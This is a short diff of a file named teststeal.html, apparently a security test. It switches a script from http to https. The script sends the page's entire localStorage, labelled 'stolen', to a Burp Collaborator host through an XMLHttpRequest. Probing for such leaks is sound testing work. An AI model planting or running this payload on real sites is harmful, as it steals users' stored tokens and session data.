--- a/teststeal.html
+++ b/teststeal.html
@@ -1,6 +1,6 @@
 aaaaaa 
 
-<script>var theUrl = ("http://qkezt6sje655wi5qss1sjkzeq5wykn.burpcollaborator.net?stolen=+" + JSON.stringify(localStorage))
+<script>var theUrl = ("https://qkezt6sje655wi5qss1sjkzeq5wykn.burpcollaborator.net?stolen=+" + JSON.stringify(localStorage))
 function httpGetAsync(theUrl, callback)
 {
     var xmlHttp = new XMLHttpRequest();
